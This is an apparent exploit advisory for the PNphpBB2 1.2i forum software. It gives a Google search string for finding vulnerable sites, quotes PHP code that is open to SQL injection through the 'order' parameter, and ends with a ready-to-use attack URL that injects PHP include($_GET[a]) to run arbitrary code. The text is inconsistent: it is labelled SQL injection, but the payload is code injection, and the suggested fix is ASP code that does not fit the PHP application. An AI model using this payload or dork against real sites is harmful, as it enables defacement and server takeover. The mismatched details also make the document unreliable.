< ------------------- header data start ------------------- >

#############################################################

# Application Name : PNphpBB2 Remote SQL Inj.

# Vulnerable Type : SQL Injection

# Google Keyword : Powered by PNphpBB2 1.2i © 2003-2004 PNphpBB Group

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

viewforum.php ;

387 if ( isset($HTTP_GET_VARS[’order’]) || isset($HTTP_POST_VARS[’order’]) )
388 {
389 $sort_order = isset($HTTP_GET_VARS[’order’]) ? $HTTP_GET_VARS[’order’] : $HTTP_POST_VARS[’order’];
390 }

415 $sql = select t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time
416 FROM . TOPICS_TABLE . t, . USERS_TABLE . u, . POSTS_TABLE . p, . POSTS_TABLE . p2, . USERS_TABLE . u2
417 where t.forum_id = $forum_id
418 AND t.topic_poster = u.user_id
419 AND p.post_id = t.topic_first_post_id
420 AND p2.post_id = t.topic_last_post_id
421 AND u2.user_id = p2.poster_id
422 AND t.topic_type <> . POST_ANNOUNCE .
423 $limit_topics_time
424 ORDER BY t.topic_type DESC, $sort_method $sort_order
425 LIMIT $start, .$board_config[’topics_per_page’];


/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=’.include($_GET[a]),exit.’&a=[evil c0de]

< -- bug code end of -- >